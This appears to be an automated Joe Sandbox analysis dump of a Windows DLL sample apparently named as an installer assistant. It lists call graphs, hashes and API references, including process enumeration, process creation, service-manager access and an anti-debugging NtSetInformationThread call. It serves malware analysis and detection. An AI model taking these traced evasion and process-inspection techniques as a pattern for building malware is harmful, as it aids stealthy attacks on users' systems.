GetCurrentProcess TerminateProcess 66913->66918 66916 6c6473da _Yarn 66914->66916 66915->66916 66917 6c7b5960 104 API calls 66916->66917 66920 6c64748d std::ios_base::_Ios_base_dtor _strlen 66917->66920 66918->66906 66919->66892 66919->66911 66919->66912 66919->66916 66920->66871 66921 6c647991 66920->66921 66922 6c6479a8 66920->66922 66926 6c647940 _Yarn _strlen 66920->66926 66923 6c7b6a43 std::_Facet_Register 4 API calls 66921->66923 66924 6c7b6a43 std::_Facet_Register 4 API calls 66922->66924 66923->66926 66924->66926 66925->66903 66926->66892 66927 6c647de2 66926->66927 66928 6c647dc9 66926->66928 66931 6c647d7c _Yarn 66926->66931 66929 6c7b6a43 std::_Facet_Register 4 API calls 66927->66929 66930 6c7b6a43 std::_Facet_Register 4 API calls 66928->66930 66929->66931 66930->66931 66932 6c7b5960 104 API calls 66931->66932 66933 6c647e2f std::ios_base::_Ios_base_dtor _strlen 66932->66933 66933->66871 66934 6c6485bf 66933->66934 66935 6c6485a8 66933->66935 66942 6c648556 _Yarn _strlen 66933->66942 66937 6c7b6a43 std::_Facet_Register 4 API calls 66934->66937 66936 6c7b6a43 std::_Facet_Register 4 API calls 66935->66936 66936->66942 66937->66942 66938 6c648983 66941 6c7b6a43 std::_Facet_Register 4 API calls 66938->66941 66939 6c64896a 66940 6c7b6a43 std::_Facet_Register 4 API calls 66939->66940 66943 6c64891d _Yarn 66940->66943 66941->66943 66942->66892 66942->66938 66942->66939 66942->66943 66944 6c7b5960 104 API calls 66943->66944 66947 6c6489d0 std::ios_base::_Ios_base_dtor _strlen 66944->66947 66945 6c648f36 66949 6c7b6a43 std::_Facet_Register 4 API calls 66945->66949 66946 6c648f1f 66948 6c7b6a43 std::_Facet_Register 4 API calls 66946->66948 66947->66871 66947->66945 66947->66946 66950 6c648ecd _Yarn _strlen 66947->66950 66948->66950 66949->66950 66950->66892 66951 6c649354 66950->66951 66952 6c64936d 66950->66952 66955 6c649307 _Yarn 66950->66955 66953 6c7b6a43 std::_Facet_Register 4 API calls 66951->66953 66954 6c7b6a43 std::_Facet_Register 4 API calls 
66952->66954 66953->66955 66954->66955 66956 6c7b5960 104 API calls 66955->66956 66959 6c6493ba std::ios_base::_Ios_base_dtor 66956->66959 66957->66903 66958 6c7b4ff0 4 API calls 66958->66885 66959->66871 66959->66958 66960->66903 66962->66895 66963 6c64f150 66965 6c64efbe 66963->66965 66964 6c64f243 CreateFileA 66967 6c64f2a7 66964->66967 66965->66964 66966 6c6502ca 66967->66966 66968 6c6502ac GetCurrentProcess TerminateProcess 66967->66968 66968->66966 66969 6c7bef3f 66970 6c7bef4b __wsopen_s 66969->66970 66971 6c7bef5f 66970->66971 66972 6c7bef52 GetLastError ExitThread 66970->66972 66973 6c7c49b2 __Getctype 37 API calls 66971->66973 66974 6c7bef64 66973->66974 66981 6c7c9d66 66974->66981 66977 6c7bef7b 66987 6c7beeaa 16 API calls 2 library calls 66977->66987 66980 6c7bef9d 66982 6c7c9d78 GetPEB 66981->66982 66983 6c7bef6f 66981->66983 66982->66983 66984 6c7c9d8b 66982->66984 66983->66977 66986 6c7c6d6f 5 API calls std::_Lockit::_Lockit 66983->66986 66988 6c7c6e18 5 API calls std::_Lockit::_Lockit 66984->66988 66986->66977 66987->66980 66988->66983 66989 6c643b72 66990 6c7b6a43 std::_Facet_Register 4 API calls 66989->66990 66996 6c6437e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66990->66996 66991 6c7aaec0 FindFirstFileA 66991->66996 66992 6c65639e 67002 6c7c0130 18 API calls 2 library calls 66992->67002 66994 6c656ba0 104 API calls 66994->66996 66995 6c656e60 32 API calls 66995->66996 66996->66991 66996->66992 66996->66994 66996->66995 66997 6c657090 77 API calls 66996->66997 66998 6c67e010 67 API calls 66996->66998 66997->66996 66998->66996 67003 6c7ccad3 67004 6c7ccafd 67003->67004 67005 6c7ccae5 __dosmaperr 67003->67005 67004->67005 67007 6c7ccb48 __dosmaperr 67004->67007 67008 6c7ccb77 67004->67008 67045 6c7c0120 18 API calls __cftoe 67007->67045 67009 6c7ccb90 67008->67009 67010 6c7ccbab __dosmaperr 67008->67010 67013 6c7ccbe7 __wsopen_s 67008->67013 67009->67010 67012 6c7ccb95 67009->67012 67038 6c7c0120 18 API calls __cftoe 67010->67038 67011 6c7d19e5 
__wsopen_s 18 API calls 67015 6c7ccd3e 67011->67015 67012->67011 67039 6c7c47bb HeapFree GetLastError _free 67013->67039 67018 6c7ccdb4 67015->67018 67021 6c7ccd57 GetConsoleMode 67015->67021 67016 6c7ccc07 67040 6c7c47bb HeapFree GetLastError _free 67016->67040 67020 6c7ccdb8 ReadFile 67018->67020 67023 6c7cce2c GetLastError 67020->67023 67024 6c7ccdd2 67020->67024 67021->67018 67025 6c7ccd68 67021->67025 67022 6c7ccc0e 67026 6c7ccbc2 __dosmaperr __wsopen_s 67022->67026 67041 6c7cac69 20 API calls __wsopen_s 67022->67041 67023->67026 67024->67023 67027 6c7ccda9 67024->67027 67025->67020 67028 6c7ccd6e ReadConsoleW 67025->67028 67042 6c7c47bb HeapFree GetLastError _free 67026->67042 67027->67026 67032 6c7cce0e 67027->67032 67033 6c7ccdf7 67027->67033 67028->67027 67031 6c7ccd8a GetLastError 67028->67031 67031->67026 67032->67026 67034 6c7cce25 67032->67034 67043 6c7ccefe 23 API calls 3 library calls 67033->67043 67044 6c7cd1b6 21 API calls __wsopen_s 67034->67044 67037 6c7cce2a 67037->67026 67038->67026 67039->67016 67040->67022 67041->67012 67042->67005 67043->67026 67044->67037 67045->67005
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                           • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                           • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: HR^
                                          • API String ID: 4218353326-1341859651
                                          • Opcode ID: 33ef746c46d28c96e16b4bb474b095592f6d1b1c965e89251ca85e73edbbce62
                                          • Instruction ID: 86eb74eb3cdef4ce1f8a880e16651d1a85ff0016cf794546f118fe5ba31b6d08
                                          • Opcode Fuzzy Hash: 33ef746c46d28c96e16b4bb474b095592f6d1b1c965e89251ca85e73edbbce62
                                          • Instruction Fuzzy Hash: 07741571644B018FC728CF28C8D06D5B7F3EF95318B19DA2DC0AA8BA55EB74B54ACB44
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: }jk$;T55$L@^
                                          • API String ID: 0-4218709813
                                          • Opcode ID: 41756269f30692aa142c610124dbf87ee3e28e5dd8e2cd1faee6372404b88412
                                          • Instruction ID: 4ceb5e4987d867994ea24cda3a03ce9942aa4f35414922e3f09462902f1878f8
                                          • Opcode Fuzzy Hash: 41756269f30692aa142c610124dbf87ee3e28e5dd8e2cd1faee6372404b88412
                                          • Instruction Fuzzy Hash: 5A341971645B018FC728CF28C8D0A96B7E3EFC5318B19CA6DC0968BB55EB74B54ACB44

                                           Control-flow Graph
                                           (graph widget residue, condensed) Function 6c7b5240-6c7b53bf: the entry block 6c7b5240-6c7b5275 calls CreateToolhelp32Snapshot; block 6c7b5334-6c7b535d calls 6c7bb920 and then Process32FirstW; block 6c7b5320-6c7b5332 calls Process32NextW and returns to the dispatch block 6c7b52a0; block 6c7b5277-6c7b5292 calls CloseHandle; block 6c7b5377-6c7b53a1 calls 6c7c2c05.
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C7B524E
                                          Similarity
                                          • API ID: CreateSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3332741929-0
                                          • Opcode ID: 7054737ebe3ad2b4e6daa2e2203786e741401c1683fef36805e7092d2d9a4dfe
                                          • Instruction ID: e703e983933c7e92049e6144f96d942527de8355b9292908d6f5d1b08757899a
                                          • Opcode Fuzzy Hash: 7054737ebe3ad2b4e6daa2e2203786e741401c1683fef36805e7092d2d9a4dfe
                                          • Instruction Fuzzy Hash: 59318DB46093009FD7519F28D988B4ABBF4AF96758F50493EF488E7360D371D8488B93

                                           Control-flow Graph
                                           (graph widget residue, condensed) Function 6c633886: a dense run of short compare-and-branch blocks between 6c63383b and 6c63414b. Blocks 6c63383b, 6c633bc0 and 6c633eea call 6c781470 and 6c781480; the only API calls are in block 6c633e81-6c633ee0, which calls 6c633750, GetCurrentThread and NtSetInformationThread.
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da5dc642548c6eaf92bb0cb1b725ad8fe32728d88a5c8c35653efc73b14671f5
                                          • Instruction ID: 32f0d11a8595c4bf471b8819d74f1bd10880e628b4263f102e148288d36f1b6d
                                          • Opcode Fuzzy Hash: da5dc642548c6eaf92bb0cb1b725ad8fe32728d88a5c8c35653efc73b14671f5
                                          • Instruction Fuzzy Hash: AD320332245B118FC324CF28C8C06A6B7E3EFD13147699A6DC0EA4BA95D775B44BCB54

                                           Control-flow Graph
                                           (graph widget residue, condensed) Function 6c633a6a: entered at 6c633a6a-6c633a85 and then sharing the block set of 6c633886 (6c63383b-6c63414b), including the calls to 6c781470 and 6c781480 at 6c63383b, 6c633bc0 and 6c633eea, and the block 6c633e81-6c633ee0 that calls 6c633750, GetCurrentThread and NtSetInformationThread.
                                          APIs
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: d793962f192c712eb317e755d40f714118a7d847a30565a9f21a3b4f0e8f94ce
                                          • Instruction ID: 7b751cb9f3b5fcaf1b08e7d4ed288f9dcf71ef5b8acf0c439d0428f36432f47a
                                          • Opcode Fuzzy Hash: d793962f192c712eb317e755d40f714118a7d847a30565a9f21a3b4f0e8f94ce
                                          • Instruction Fuzzy Hash: 8D51F031105B118FC320CF28C8847D5B7E3BF91314F69AA6DC0EA1BA95DB79B44B8B85
                                          APIs
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: ee5f5162bf21d34888a33b87c743744e319fa8fac667b706e606a4952f2e7fa4
                                          • Instruction ID: 0ebcabb94689490263bd7176810bdbdd0efa578e701d08f281e8661a725ab02b
                                          • Opcode Fuzzy Hash: ee5f5162bf21d34888a33b87c743744e319fa8fac667b706e606a4952f2e7fa4
                                          • Instruction Fuzzy Hash: 9C51E131504B218BC320CF28C4807D5B7E3BF95314F69AA6DC0EA5BA95DB75B44B8B94
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6C633E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C633EAA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: e9974abaf5932ece2b8b1b79bc34135cf3ddfa5bda68beb2f6c037e438a3f972
                                          • Instruction ID: 19b6a84b1dbeefc673ce8c0abbd98c7e71d0ab4e454ff24f9db33a76e60b4672
                                          • Opcode Fuzzy Hash: e9974abaf5932ece2b8b1b79bc34135cf3ddfa5bda68beb2f6c037e438a3f972
                                          • Instruction Fuzzy Hash: AB313831205B11CFC320CF24C8847D6BBA3AF96314F596E6DC0AA5BA91DBB9700ACB55
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6C633E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C633EAA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: 84f480fb9bb830b07a8b6b295f333df2602b7ec0936a5bdedf5eda5b01a7b552
                                          • Instruction ID: eddcf281ee65abf9d43990df716d798b359692d7d99971f1c0f6f16398ea7cd6
                                          • Opcode Fuzzy Hash: 84f480fb9bb830b07a8b6b295f333df2602b7ec0936a5bdedf5eda5b01a7b552
                                          • Instruction Fuzzy Hash: B7312331104B118BC720CF28C4947E6BBF2AF92308F656E6DC0EE5BA85DBB57406CB95
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6C633E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C633EAA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: eb4e491c2a84219f2877a47314b6d596ddd13a97dc2926b0f050019fee23f759
                                          • Instruction ID: e0e17a28816ca5fc6f8e7628fd966decffdc25a43659ee65f8e4402fbc694ba3
                                          • Opcode Fuzzy Hash: eb4e491c2a84219f2877a47314b6d596ddd13a97dc2926b0f050019fee23f759
                                          • Instruction Fuzzy Hash: F421F730218B118BD724CF24C8947E6BBB2AF82308F546A2DC0BE4BA91DBB57405CB55
                                          APIs
                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C7B5130
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID:
                                          • API String ID: 1889721586-0
                                          • Opcode ID: 5945863e8c8bd29207118839edb1e4a90e8c2c7c4fb144ea69d1dba2fdd37c11
                                          • Instruction ID: 87f7b93f936b6a15a4d81226f7bbedc217519b92a407ea67fc500b63865cec81
                                          • Opcode Fuzzy Hash: 5945863e8c8bd29207118839edb1e4a90e8c2c7c4fb144ea69d1dba2fdd37c11
                                          • Instruction Fuzzy Hash: 3F3149B4608306EFC7518F28D645A0ABBF4ABCA758F50896AF888D6360C331C845DB57
                                          APIs
                                          • FindFirstFileA.KERNEL32(?,?), ref: 6C7AAEDC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: fc2f3b8918c18965bec985acfd7d2a82419202364f8c865d650649bfd0369ce8
                                          • Instruction ID: 71e3839a957aa26753a051cea68de5fc9122c2f498d309346e51bc9ea0adb25a
                                          • Opcode Fuzzy Hash: fc2f3b8918c18965bec985acfd7d2a82419202364f8c865d650649bfd0369ce8
                                          • Instruction Fuzzy Hash: 67113AB45093509FD7148B68D64450EBBE4BF8A324F148E69F4A8CB691D330CC498F66
                                          APIs
                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C78ABA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                          • API String ID: 2738559852-1563143607
                                          • Opcode ID: d303100c6991886da40dffd4b1e54e1401865427909787678d0b9ee62be631e4
                                          • Instruction ID: 4ce4718fe4dfdbb727cae38a28ccebf7b5198183b00439da63309154ae691880
                                          • Opcode Fuzzy Hash: d303100c6991886da40dffd4b1e54e1401865427909787678d0b9ee62be631e4
                                          • Instruction Fuzzy Hash: 3F625C7060E3818FC724CF18C590A5ABBE2AFD9714F148D2EE6A9CB791D735E8458B43

Control-flow Graph
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: 8Q
                                          • API String ID: 0-4022487301
                                          • Opcode ID: 757d3707cd355d2209f43cd4dd3e7bd92084cf9c8e6d33168d0c0727e92f4984
                                          • Instruction ID: 2da4b9fadff74bb49393a98dd6a1e781f18411f479caf220f3b6544b76c79461
                                          • Opcode Fuzzy Hash: 757d3707cd355d2209f43cd4dd3e7bd92084cf9c8e6d33168d0c0727e92f4984
                                          • Instruction Fuzzy Hash: 8DC11774F0424AAFDF01DFA8CA84BADBFB4AF0A319F144169E410A7B41C7719945CB66

Control-flow Graph
                                          APIs
                                            • Part of subcall function 6C7D4457: CreateFileW.KERNEL32(00000000,00000000,?,6C7D4115,?,?,00000000,?,6C7D4115,00000000,0000000C), ref: 6C7D4474
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D4180
                                          • __dosmaperr.LIBCMT ref: 6C7D4187
                                          • GetFileType.KERNEL32(00000000), ref: 6C7D4193
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D419D
                                          • __dosmaperr.LIBCMT ref: 6C7D41A6
                                          • CloseHandle.KERNEL32(00000000), ref: 6C7D41C6
                                          • CloseHandle.KERNEL32(6C7CB0D0), ref: 6C7D4313
                                          • GetLastError.KERNEL32 ref: 6C7D4345
                                          • __dosmaperr.LIBCMT ref: 6C7D434C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: 8Q
                                          • API String ID: 4237864984-4022487301
                                          • Opcode ID: d78887c7dfbac650f49e349e41eee1a575dbe4968eaea77aa457c8b5b7c43785
                                          • Instruction ID: 077e229ed13a4fb20be2593681172fec1310ae22bc49fd7f8f9460753a7f7ddf
                                          • Opcode Fuzzy Hash: d78887c7dfbac650f49e349e41eee1a575dbe4968eaea77aa457c8b5b7c43785
                                          • Instruction Fuzzy Hash: 60A15832A041449FCF09CF78C9597AE7BB1AF4B328F194269E811EF790CB35A806DB51

Control-flow Graph
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                          • API String ID: 0-4100612575
                                          • Opcode ID: 4914bdc44ae117a4faac5dfe211340df65d1976e7a51825e4fcf8082be744eef
                                          • Instruction ID: 067513532343ea36e9e062d1c4f777c7908afd11e35c8392842daf95439f1f6e
                                          • Opcode Fuzzy Hash: 4914bdc44ae117a4faac5dfe211340df65d1976e7a51825e4fcf8082be744eef
                                          • Instruction Fuzzy Hash: 07716EB02093459FD710DF54C580B5ABBE4FF8A709F108A3EF698D6650D371D8589B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                          • API String ID: 0-174837320
                                          • Opcode ID: 04797e77253e218d8c06333c79e58bb129616aeb9e7b8b0fba78a9ca8bed30f8
                                          • Instruction ID: ba8c12577788029b601f321423ceb0268066e3908288eaf62eaf5fee0c87fb8d
                                          • Opcode Fuzzy Hash: 04797e77253e218d8c06333c79e58bb129616aeb9e7b8b0fba78a9ca8bed30f8
                                          • Instruction Fuzzy Hash: B3428B7460A381DFCB54CF29C990A1ABBE2AFC9314F249D2EE69587B20D734E445CB53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: ;T55
                                          • API String ID: 0-2572755013
                                          • Opcode ID: 6b58fc113ab39f5df9349fe8c721ee6cb28530002a5343f6176a4d5d9ae26893
                                          • Instruction ID: 778062063f2608983bc371f27897f2dd89179f64c28aacc7f8235df7c5f47b99
                                          • Opcode Fuzzy Hash: 6b58fc113ab39f5df9349fe8c721ee6cb28530002a5343f6176a4d5d9ae26893
                                          • Instruction Fuzzy Hash: 29030431645B018FC728CF28C8D0696B7E3EFD5328719CB2DC0AA4BA95DB74B44ACB55

                                          Control-flow Graph
                                          • Function at 6c7b4ff0: calls CreateProcessA, WaitForSingleObject and CloseHandle (x2); graph node/edge listing omitted
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: D
                                          • API String ID: 963392458-2746444292
                                          • Opcode ID: 05e60addf816329b8b1e08408034ba26a9fbf984199f46ba926d1f0209bea490
                                          • Instruction ID: 039b76dd7a62185e8e03bee6cb8c2720635693b42b036e9b2947063dde9a1a16
                                          • Opcode Fuzzy Hash: 05e60addf816329b8b1e08408034ba26a9fbf984199f46ba926d1f0209bea490
                                          • Instruction Fuzzy Hash: A431E2708097408FD750DF28D29872ABBF0EBDA318F505A1DF49996250E7759588CF87

                                          Control-flow Graph
                                          • Function at 6c7cbc5e: calls WriteFile and GetLastError plus internal subroutines; graph node/edge listing omitted
                                          APIs
                                            • Part of subcall function 6C7CBEB1: GetConsoleCP.KERNEL32(?,6C7CB0D0,?), ref: 6C7CBEF9
                                          • WriteFile.KERNEL32(?,?,6C7D46EC,00000000,00000000,?,00000000,00000000,6C7D5AB6,00000000,00000000,?,00000000,6C7CB0D0,6C7D46EC,00000000), ref: 6C7CBDAF
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C7D46EC,6C7CB0D0,00000000,?,?,?,?,00000000,?), ref: 6C7CBDB9
                                          • __dosmaperr.LIBCMT ref: 6C7CBDFE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 251514795-4022487301
                                          • Opcode ID: 7b39e18c50eae5b6d915b511bc5eae0bd8c84d48d782a0e71f2b2bffaabd2a90
                                          • Instruction ID: 077e35427226e5b17d54c2096e0054dfab99b54902fb52b6da897a9abaa18fa0
                                          • Opcode Fuzzy Hash: 7b39e18c50eae5b6d915b511bc5eae0bd8c84d48d782a0e71f2b2bffaabd2a90
                                          • Instruction Fuzzy Hash: A151E675B0020BAFDB01DFB8CA49BEEBB79EF0A718F140461F510A7A51D730A945C7A2

                                          Control-flow Graph
                                          • Function at 6c7b5b90: calls internal subroutines only (no Win32 API nodes); graph node/edge listing omitted
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C7B5D31
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 323602529-1866435925
                                          • Opcode ID: 9641cef81e73100d25ac9aa6cb9135671550cabdc5da146cd6e6cdf48f314447
                                          • Instruction ID: 59a6a745aa9010556903581bc8429c3d093849c4e1cc338e1860de8eefa60849
                                          • Opcode Fuzzy Hash: 9641cef81e73100d25ac9aa6cb9135671550cabdc5da146cd6e6cdf48f314447
                                          • Instruction Fuzzy Hash: 2B5143B5900B008FD725CF29C995B97BBF1FB88318F108A2DD8865BB91D775B909CB90

                                          Control-flow Graph
                                          • Function at 6c7cb925: calls CloseHandle and GetLastError plus internal subroutines; graph node/edge listing omitted
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6C7D425F), ref: 6C7CB97B
                                          • GetLastError.KERNEL32(?,00000000,?,6C7D425F), ref: 6C7CB985
                                          • __dosmaperr.LIBCMT ref: 6C7CB9B0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          • Opcode ID: 5166734577c85417f385b93bd3efa12f3871acdec2e105b3e787b27b0e2d3124
                                          • Instruction ID: 07abe0b108ce122cc9efcea071e60ea51471bc42ab75701b4c0ac4f36e2de6f0
                                          • Opcode Fuzzy Hash: 5166734577c85417f385b93bd3efa12f3871acdec2e105b3e787b27b0e2d3124
                                          • Instruction Fuzzy Hash: 1A014833B451219FC611067A974D79E3B654F83B3CF2A0369F81687AC0CB61F8898292

                                          Control-flow Graph
                                          • Function at 6c7c0b9c: calls internal subroutines only (no Win32 API nodes); graph node/edge listing omitted
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
